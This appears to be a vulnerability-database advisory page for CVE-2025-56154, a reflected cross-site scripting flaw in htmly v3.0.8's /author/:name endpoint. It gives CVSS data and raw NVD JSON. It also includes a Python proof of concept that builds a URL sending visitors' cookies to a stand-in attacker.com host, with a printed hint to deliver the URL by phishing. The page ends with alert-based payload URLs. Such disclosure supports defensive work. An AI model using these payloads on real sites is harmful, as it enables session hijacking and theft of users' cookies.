Security Vulnerability Report
中文
CVE-2025-56154 CVSS 6.1 MEDIUM

CVE-2025-56154

Published: 2025-10-02 16:15:35
Last Modified: 2026-01-20 18:16:05
Source: [email protected]

Description

htmly v3.0.8 is vulnerable to Cross Site Scripting (XSS) in the /author/:name endpoint of the affected application. The name parameter is not properly sanitized before being reflected in the HTML response, allowing attackers to inject arbitrary JavaScript payloads.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:htmly:htmly:3.0.8:*:*:*:*:*:*:* - VULNERABLE
htmly <= v3.0.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
## CVE-2025-56154 - htmly Reflected XSS PoC ## Affected: htmly <= v3.0.8 ## Endpoint: /author/:name ## Author: akinerkisa # Basic PoC - Cookie stealing via reflected XSS # The payload is injected into the /author/:name endpoint import requests TARGET_URL = "http://target-htmly-site.com" ATTACKER_SERVER = "http://attacker.com/steal" # Malicious JavaScript payload to steal cookies payload = f'<script>document.location="{ATTACKER_SERVER}?c="+document.cookie</script>' # Construct the exploit URL exploit_url = f"{TARGET_URL}/author/{payload}" print(f"[+] Exploit URL: {exploit_url}") print("[+] Send this URL to the victim via phishing email/messaging") # Verify the vulnerability response = requests.get(exploit_url) if payload in response.text: print("[+] Vulnerability confirmed! Payload reflected without sanitization.") else: print("[-] Payload not found in response. Target may be patched.") ## Alternative simple PoC URL: ## http://target-htmly-site.com/author/<script>alert('XSS')</script> ## http://target-htmly-site.com/author/<img src=x onerror=alert(document.cookie)>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56154", "sourceIdentifier": "[email protected]", "published": "2025-10-02T16:15:34.773", "lastModified": "2026-01-20T18:16:04.927", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "htmly v3.0.8 is vulnerable to Cross Site Scripting (XSS) in the /author/:name endpoint of the affected application. The name parameter is not properly sanitized before being reflected in the HTML response, allowing attackers to inject arbitrary JavaScript payloads."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:htmly:htmly:3.0.8:*:*:*:*:*:*:*", "matchCriteriaId": "1DC9B20D-4A16-40EA-8522-B7049331B704"}]}]}], "references": [{"url": "https://gist.github.com/akinerkisa/28e97fa132b1a98cff5d05a79b437901", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/danpros/htmly/releases/tag/v3.0.9#:~:text=Security%20fixes%20found%20in%20version%203.0.8", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://pastebin.com/dVityKmU", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.